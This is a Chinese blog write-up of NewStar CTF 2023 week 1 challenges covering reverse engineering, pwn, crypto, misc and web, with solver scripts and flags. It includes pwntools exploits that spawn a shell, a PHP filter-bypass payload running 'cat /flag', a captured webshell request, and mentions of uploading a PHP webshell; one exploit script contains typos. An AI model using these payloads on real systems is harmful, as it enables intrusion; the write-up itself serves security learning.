newstar2023_week1

ctf writeup

 2023/12/28 

RE

easy_RE

确实是打开就有

1	flag{we1c0me_to_rev3rse!!}

elf

inputString 先异或然后+16 然后base64encode后和flag cmp，decode后-16 异或就好了

s1 = (char *)base64_encode(v6, v3);
  if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
  
 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

_BYTE *__fastcall encode(const char *a1)
{
  size_t v1; // rax
  int v2; // eax
  _BYTE *v4; // [rsp+20h] [rbp-20h]
  int i; // [rsp+28h] [rbp-18h]
  int v6; // [rsp+2Ch] [rbp-14h]

  v1 = strlen(a1);
  v4 = malloc(2 * v1 + 1);
  v6 = 0;
  for ( i = 0; i < strlen(a1); ++i )
  {
    v2 = v6++;
    v4[v2] = (a1[i] ^ 0x20) + 16;
  }
  v4[v6] = 0;
  return v4;
}

import base64

def custom_base64_decode(encoded_str):
    custom_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    standard_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    translation = str.maketrans(custom_base64_chars, standard_base64_chars)
    return base64.b64decode(encoded_str.translate(translation))

def xor(encoded_bytes):
    decoded_chars = []
    for byte in encoded_bytes:
        char = chr((byte - 16) ^ 0x20)
        decoded_chars.append(char)
    return ''.join(decoded_chars)


encoded_str = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
print(xor(custom_base64_decode(encoded_str)))

1	flag{D0_4ou_7now_wha7_ELF_1s?}

咳

die查壳是upx4.0.2 , 在这里下载https://github.com/upx/upx/releases

然后upx -d filename 脱壳

for ( i = 0i64; ; ++i )
{
  v4 = &Str1[strlen(Str1)];
  if ( i >= v4 - Str1 )
    break;
  ++Str1[i];
}
if ( !strncmp(Str1, enc, v4 - Str1) )

gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~

大概是吧str1全部++了一边 –回去就好了

flag = "gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~"
flag = [c for c in flag]
for i in range(len(flag)):
    flag[i] = chr(ord(flag[i]) - 1)
    print(flag[i] , end="")

1	flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}

Segments

shift_f7 打开段视图，然后拼接flag

1	flag{You_ar3_g0od_at_f1nding_ELF_segments_name}

AndroXor

关键逻辑在这里，能看到长度，还有异或的操作，只需要根据happyx3 还有 cArr置反就能得到inputString

public String Xor(String str, String str2) {
        char[] cArr = {14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r'};
        char[] cArr2 = new char[str.length()];
        String str3 = str.length() != 25 ? "wrong!!!" : "you win!!!";
        for (int i = 0; i < str.length(); i++) {
            char charAt = (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));
            cArr2[i] = charAt;
            if (cArr[i] != charAt) {
                return "wrong!!!";
            }
        }
        return str3;
    }

1	Toast.makeText(mainActivity, mainActivity.Xor(obj, "happyx3"), 1).show();

str2 = "happyx3"
cArr = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']

str1 = ''.join([chr(cArr[i] ^ ord(str2[i % len(str2)])) if isinstance(cArr[i], int) else chr(ord(cArr[i]) ^ ord(str2[i % len(str2)])) for i in range(len(cArr))])
print(str1)

1	flag{3z_And0r1d_X0r_x1x1}

Endian

这里v5是个指针来的，一开始看有些怪，过一会就懂了。需要再异或一次，然后按字节拆分数字，小端序转大端序就好了

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+4h] [rbp-3Ch]
  char *v5; // [rsp+8h] [rbp-38h]
  char v6[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+38h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  puts("please input your flag");
  __isoc99_scanf("%s", v6);
  v5 = v6;
  for ( i = 0; i <= 4; ++i )
  {
    if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )
    {
      printf("wrong!");
      exit(0);
    }
    v5 += 4;
  }
  printf("you are right");
  return 0;
}

def process_and_combine(hex_values):
    
    xor_results = [hex(int(value, 16) ^ 0x12345678) for value in hex_values]

    reversed_strings = []
    for xor_result in xor_results:
        xor_result = xor_result[2:].rjust(8, '0')
        result_string = "".join([chr(int(xor_result[i:i + 2], 16)) for i in range(0, 8, 2)])
        reversed_strings.append(result_string[::-1])

    combined_string = "".join(reversed_strings)

   	return combined_string


flag = ["75553A1E", "7B583A03", "4D58220C", "7B50383D", "736B3819"]
inputString = process_and_combine(flag)

print(inputString)

1	flag{llittl_Endian_a}

EzPE

修复pe头的话，找个exe 010edit从开始到0x70h那一行粘贴一下，就好了

异或置反一下就好了

data = [
    0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C, 
    0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51, 
    0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04, 
    0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D
]

input_recovered = [0] * len(data)
input_recovered[-1] = data[-1]

for i in range(len(data) - 2, -1, -1):
    input_recovered[i] = data[i] ^ (i ^ input_recovered[i + 1])

for i in input_recovered:
    print(chr(i),end="")

1	flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

lazy_activtiy

activtiy是提供用户界面，可以使用户交互的，程序中有个flag activtiy但是主界面没有什么地方能够调用这个activity的搜了一下可以用

1	am start -n com.droidlearn.activity_travel/com.droidlearn.activity_travel.FlagActivity

这个命令adb shell的命令来调用一个应用的activtiy

这边是flag activity的关键逻辑，可以反编译然后将10000改成1就好了。但是折腾了好久apktools反编译打包有问题，还有签名那，后面找了一个安卓修改大师破解版，一键打包签名就正常了

public void onClick(View view) {
                textView.setText(Integer.toString(FlagActivity.access$004(FlagActivity.this)));
                if (FlagActivity.this.cnt >= 10000) {
                    Toast.makeText(FlagActivity.this, editText.getText().toString(), 0).show();
                }
            }

1	flag{Act1v1ty_!s_so00oo0o_Impor#an#}

pwn

ret2text

有个backdoor函数，溢出后跳过去就好了

from pwn import *
from LibcSearcher import *

elf = context.binary = ELF('./ret2text')
#
ip = "node4.buuoj.cn"
port = 29750

# p = process()
p = remote(ip,port)


line = p.recvline(); print(line) # Welcome to NewStar CTF!!
line = p.recvline(); print(line) # Show me your magic


backdoor_address = 0x4011FB
payload = b'a' * (32 + 8)
paylaod += backdoor_adress


p.sendline(payload)

p.interactive()

ezshellcode

shellcode输入后会直接jmp到buf那，所以只需要把shellcode输入就好了

from pwn import *
from LibcSearcher import *

elf = context.binary = ELF('./ezshellcode')
#
ip = "node4.buuoj.cn"
port = 29750

# p = process()
p = remote(ip,port)

context(arch='amd64', os='linux')


line = p.recvline(); print(line) # Welcome to NewStar CTF!!
line = p.recvline(); print(line) # Show me your magic


shellcode  =  asm(shellcraft.sh())

payload = shellcode


p.sendline(payload)

p.interactive()

newstar shop

选1进商店买到没钱然后选3 -50后，uint溢出就能直接买/bin sh了

1	flag{8b42af7c-c695-489a-ad79-1bff9d84f52c}

p1eee

咱是笨蛋，习惯性看ida中的函数视图了，没注意到关键函数下面有个用_asm{}写的直接system bin sh的块，pie的话低三位16进制的地址是不变的，所以只需要在return位置那填充低位地址，根据原有的高位地址，就能跳过去。

.text:0000000000001264 ; __unwind {
.text:0000000000001264                 endbr64
.text:0000000000001268                 push    rbp
.text:0000000000001269                 mov     rbp, rsp
.text:000000000000126C                 lea     rdi, aBinSh     ; "/bin/sh"
.text:0000000000001273                 call    _system
.text:0000000000001278                 nop
.text:0000000000001279                 pop     rbp
.text:000000000000127A                 retn
.text:000000000000127A ; } // starts at 1264

from pwn import *

elf = context.binary = ELF('./p1eee')
ip = "node4.buuoj.cn"
port = 26886

context.log_level = 'debug'
# p = process()
p = remote(ip,port)

line = p.recvline(); print(line)

payload = b'a' * (32 + 8) + p8(0x6C)

p.sendline(payload)
p.interactive()

1	flag{cc6d8d8e-cae4-4f5d-88b5-8ddd66f66a2c}

Random

可以用ctypes 调用libc中的time srand rand函数，校园网好卡，去外边才打通了，要多跑几遍，随机数拼凑字符对了才可以

https://blog.csdn.net/qq_29912475/article/details/130319284

from pwn import *
import ctypes

elf = context.binary = ELF('./Random')
context.log_level = 'debug'
libc = ctypes.CDLL("libc.so.6")

ip = "node4.buuoj.cn"
port = 25248
p = remote(ip,port)

# p = process()

#初始化函数返回值
libc.time.restype = ctypes.c_long
libc.srand.argtypes = [ctypes.c_uint]

#调用函数
time_value = ctypes.c_longlong(0)
seed = libc.time(ctypes.byref(time_value))
libc.srand(seed)
rand_result = libc.rand()

line = p.recvline(); print(line)
p.sendline(str(rand_result))

p.interactive()

1	flag{f5be13ec-f7f0-4dea-ab64-31470e102fbf}

Crypto

brainfuck

可以用这个解密 https://ctf.bugku.com/tool/brainfuck

1	flag{Oiiaioooooiai#b7c0b1866fe58e12}

Caesar’s Secert

想到偏移量，凯撒密码，https://ctf.bugku.com/tool/caesar 偏移5解出flag

1	flag{ca3s4r's_c1pher_i5_v4ry_3azy}

Fence

栅栏密码 https://www.qqxiuzi.cn/bianma/zhalanmima.php 解密

1	flag{reordering_the_plaintext#686f8c03}

Vigenère

def vigenere_decrypt_single(char_ciphertext, char_plaintext):
    alphabet = "abcdefghijklmnopqrstuvwxyz"
    index_ciphertext = alphabet.index(char_ciphertext)
    index_plaintext = alphabet.index(char_plaintext)
    index_key = (index_ciphertext - index_plaintext) % 26
    return alphabet[index_key]

ciphertext = "pqcq"
plaintext = "flag"


key = "".join([vigenere_decrypt_single(ciphertext[i], plaintext[i]) for i in range(4)])
print(key)

跑出来是kfck, 猜测是kfckfc，用kfc解密后拿到flag

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}

babyrsa

Q&A:

1选择N = p * q是因为N有能够唯一分解成p q两个因子的特性

2为什么φ(p) =(p-1)？

是因为p是素数这个特性，所以和p互质的数是p-1个

3 ed≡1(mod φ(N)) 这个是根据扩欧几里得推导出来的

扩欧几里得的定义是能找到整数x ，y 使得ax + by = gcd(a,b)

e和d是互质的，所以使得 ex + φ(N)y = 1 然后φ(N)y = 0，所以就算出ed≡1(mod φ(N))

http://www.factordb.com/index.php 可以用这个在线的网站分解n，然后求phi n，通过phi n求e的逆元d解密

from Crypto.Util.number import long_to_bytes

# 计算phi n
def calculate_phi_n(factors):
    phi_n = 1
    for p in factors:
        phi_n *= (p - 1)
    return phi_n

# 求逆元
def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    return x % m

def extended_gcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = extended_gcd(b % a, a)
        return (g, x - (b // a) * y, y)

def rsa_decrypt(c, n, e, factors):
    phi_n = calculate_phi_n(factors)
    d = modinv(e, phi_n)
    m = pow(c, d, n)
    return long_to_bytes(m).decode()

n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
factors = [
    2217990919, 2338725373, 2370292207, 2463878387, 2706073949,
    2794985117, 2804303069, 2923072267, 2970591037, 3207148519,
    3654864131, 3831680819, 3939901243, 4093178561, 4278428893
]

decrypted_message = rsa_decrypt(c, n, e, factors)
print(decrypted_message)

babyencoding

part1 和part2有=号，然后part1是大小写字母加数字，2是纯大写字母，应该是base64和32.

part3搜了好久，在这篇文章中找到了https://blog.csdn.net/Retrovich/article/details/90313591 是uuencode编码，在线解密拼接得到flag

1	flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

后面去看了一下群里的crypto入门的文档，发现里面就有uuencode的识别方法

Small d

Michael J. Wiener 觉得很赞这个搜了一下，有一种针对small d的攻击方式叫维纳攻击

https://blog.csdn.net/rreally/article/details/111092579

import gmpy2

def transform(x, y):  # 使用辗转相处将分数 x/y 转为连分数的形式
    res = []
    while y:
        res.append(x // y)
        x, y = y, x % y
    return res

def continued_fraction(sub_res):
    numerator, denominator = 1, 0
    for i in sub_res[::-1]:  # 从sublist的后面往前循环
        denominator, numerator = numerator, i * numerator + denominator
    return denominator, numerator  # 得到渐进分数的分母和分子，并返回

# 求解每个渐进分数
def sub_fraction(x, y):
    res = transform(x, y)
    res = list(map(continued_fraction, (res[0:i] for i in range(1, len(res)))))  # 将连分数的结果逐一截取以求渐进分数
    return res

def get_pq(a, b, c):  # 由p+q和pq的值通过维达定理来求解p和q
    par = gmpy2.isqrt(b * b - 4 * a * c)  # 由上述可得，开根号一定是整数，因为有解
    x1, x2 = (-b + par) // (2 * a), (-b - par) // (2 * a)
    return x1, x2

def wienerAttack(e, n):
    for (d, k) in sub_fraction(e, n):  # 用一个for循环来注意试探e/n的连续函数的渐进分数，直到找到一个满足条件的渐进分数
        if k == 0:  # 可能会出现连分数的第一个为0的情况，排除
            continue
        if (e * d - 1) % k != 0:  # ed=1 (mod φ(n)) 因此如果找到了d的话，(ed-1)会整除φ(n),也就是存在k使得(e*d-1)//k=φ(n)
            continue

        phi = (e * d - 1) // k  # 这个结果就是 φ(n)
        px, qy = get_pq(1, n - phi + 1, n)
        if px * qy == n:
            p, q = abs(int(px)), abs(int(qy))  # 可能会得到两个负数，负负得正未尝不会出现
            d = gmpy2.invert(e, (p - 1) * (q - 1))  # 求ed=1 (mod  φ(n))的结果，也就是e关于 φ(n)的乘法逆元d
            return d
    print("该方法不适用")


e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
d = wienerAttack(e, n)
print("d=", d)

求出d后解密flag

from Crypto.Util.number import *

c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
d = 2357048593

flag = pow(c,d,n)
print(long_to_bytes(flag))

babyxor

flag按字节异或上f，需要爆破f，f的范围是一个字节0-255，把0-255按字节异或上c跑一遍就好了

c = "e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2"
c = bytes.fromhex(c)

flag = ""
for key in range(256):
    flag = bytes([b ^ key for b in c])
    if b"flag" in flag:
        print(flag)

Affine

仿射密码，这里要求解的问题是置反(key[0]*f + key[1]) % modulus 这个操作

可以简化成m = (c -key[1]) * key[0]的模逆，用扩欧几里得来求模逆

from itertools import product

c = "dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064"
c = bytes.fromhex(c)

# 求模逆
def modinv(a, m):
    for i in range(1, m):
        if (a * i) % m == 1:
            return i
    return None

for k0, k1 in product(range(256), repeat=2):
    k0_inv = modinv(k0, 256)
    if k0_inv is None:
        continue

    decrypted = []
    for b in c:
        f = ((b - k1) * k0_inv) % 256
        decrypted.append(f)

    flag = str(bytes(decrypted))
    if "flag" in flag:
        print(flag)

babyaes

key是由两个相同的长度16字节的字符串组成，bytes_to_long(key) ^ bytes_to_long(iv) ^ 1这里只异或了key的16字节，所以可以算出key，然后用key的低位异或可以算出iv,用iv 和key 使用aes cbc mode就能解出flag

from Crypto.Cipher import AES
from Crypto.Util.number import *

xor = 3657491768215750635844958060963805125333761387746954618540958489914964573229
flag = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
xor = long_to_bytes(xor)
key = xor[:16]*2

iv = bytes_to_long(key[16:]) ^ bytes_to_long(xor[16:])
iv = long_to_bytes(iv)

aes = AES.new(key,AES.MODE_CBC,iv)
flag = aes.decrypt(flag)
print(flag)

Misc

CyberChef’s Secret

base32 -> base58 ->base64

1	flag{Base_15_S0_Easy_^_^}

机密图片

lsb隐写

1	flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}

流量！鲨鱼！

看了一下，很多无用http的数据包用http.response.code == 200筛选后，找到这个

GET /1.php?cmd=base64%20/.ffffllllllll11111144444GGGGGG|base64 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=85usgbksv9rn85kdcsgu5j0903
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0

HTTP/1.1 200 OK
Date: Sat, 19 Aug 2023 06:20:45 GMT
Server: Apache/2.4.51 (Debian)
X-Powered-By: PHP/7.3.33
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

然后base64解密两次，拿到flag

1	flag{Wri35h4rk_1s_u53ful_b72a609537e6}

压缩包们

https://www.cnblogs.com/Hardworking666/p/15866121.html

https://blog.csdn.net/q20010619/article/details/109425270

搜了一下，缺个zip头 https://blog.csdn.net/qq_29566629/article/details/122936177

加上50 4B 03 04后解压，发现结尾有一串base64编码，解密后提示密码是6位数的，

用ARCHPR破解有些问题，搜了一下装了一个Ziperello，破解后拿到flag

1	flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}

空白格

在这篇文章找到了解决方法

https://blog.csdn.net/qq_51999772/article/details/122418926

https://vii5ard.github.io/whitespace/

运行得到flag

1	flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}

隐秘的眼睛

silenteye 下载这个工具，然后解密拿到flag

https://www.sqlsec.com/2018/01/ctfwav.html#SilentEye

https://achorein.github.io/silenteye/

1	flag{R0ck1ng_y0u_63b0dc13a591}

web

泄漏的秘密

用dirmap 发现有个www.zip 和robot 拼接index中的flag和robots的flag后得到flag

1	flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

有段js的代码检测上传的类型，在firefox里面把js禁用后就能上传php文件了

用一句话木马加蚁剑在根目录下找到flag

1	flag{e9ed8544-e37e-4c4a-ac21-d7cacf157dbf}

Begin of HTTP

POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:2866
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: newstarctf.com
DNT: 1
Connection: close
Referer: newstarctf.com
Cookie: power=ctfer
X-Real-IP: 127.0.0.1
Upgrade-Insecure-Requests: 1

secret=n3wst4rCTF2023g00000d

1	flag{5937a957-5910-4eec-91c3-84e1a8911d97}

ErrorFlask

https://www.freebuf.com/articles/network/247503.html

根据提示，用空参数的时候flask就报错了，就把flag泄露出来了

1	http://98e6da3a-09a5-40e7-bac4-776d4dd52435.node4.buuoj.cn:81/?number1=1&number2=

1	flag = "flag{Y0u_@re_3enset1ve_4bout_deb8g}"

报错的地方在这里，空参数的时候request.args.get会返回’’ 然后int转型就会报错

num1 = request.args.get("number1");
num2 = request.args.get("number2");

return "not ssti,flag in source code~"+str(int(num1)+int(num2))

Begin of PHP

level1用0e绕过 level2传数组过去 level3传数组过去，level4加一个url编码is_numberic就识别不出来了，level5传一个符号就好了

https://blog.csdn.net/qq_46145027/article/details/124514124

https://www.cnblogs.com/zhengna/p/12342124.html

https://www.cnblogs.com/Primzahl/p/6018158.html

1
2
3

http://34cb9ad6-2b68-4fd9-a2fc-9a6698c8b0c5.node4.buuoj.cn:81/?key1=QNKCDZO&key2=s878926199a&key4[]=1&key5=2024%20

post: key3[]=@&flag5[]=@

1	flag{3a48262b-ac99-4f09-85ed-9ac23cec050e}

R!C!E!

password爆破脚本

import hashlib
import itertools
import string
import threading

TARGET_PREFIX = "c4d038"
MAX_LENGTH = 6
CHARSET = string.ascii_lowercase + string.digits
THREADS = 4

def generate_strings(length):
    return itertools.product(CHARSET, repeat=length)

def md5(s):
    return hashlib.md5(s.encode()).hexdigest()

def check_string(start, end):
    for s in itertools.islice(generate_strings(MAX_LENGTH), start, end):
        if md5(''.join(s)).startswith(TARGET_PREFIX):
            print(f"Found: {''.join(s)}")
            return ''.join(s)
    return None

def threaded_bruteforce():
    total_combinations = len(CHARSET) ** MAX_LENGTH
    step = total_combinations // THREADS

    threads = []
    for i in range(THREADS):
        start = i * step
        end = (i + 1) * step if i != THREADS - 1 else total_combinations
        t = threading.Thread(target=check_string, args=(start, end))
        threads.append(t)
        t.start()

    for t in threads:
        t.join()

if __name__ == "__main__":
    # threaded_bruteforce()
    print(md5("apofox"))

非法变量名的转换 https://www.cnblogs.com/meng-han/p/16804708.html

phpinfo发现可以用拼接函数的方式绕过 https://blog.csdn.net/LYJ20010728/article/details/117469219

1	password=apofox&e[v.a.l=(sy.(st).em)("ca"."t /fla"."g");

EasyLogin

注册个账户后登录时候有个302的包显示这个，这个是个假的

<!-- 恭喜你找到flag -->
<!-- flag 为下方链接中视频简介第7行开始至第10行的全部小写字母和数字 -->
<!-- https://b23.tv/BV1SD4y1J7uY -->
<!-- 庆祝一下吧！ -->

后面尝试去爆破admin,用burp中的brute forcer然后套md5爆破，爆破出来的密码是000000，然后有个302的包里面有flag

1	flag{3e7dd426-5475-4789-9605-b1fac334af0f}

Author：nyyyddddn

Link：https://nyyyddddn.github.io/2023/12/28/newstar2023-week1/

Publish date：December 28th 2023, 8:04:37 pm

Update date：March 27th 2024, 5:46:08 pm

License：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

Next Post

moectf_wp
Previous Post

exp本地不通远程通的问题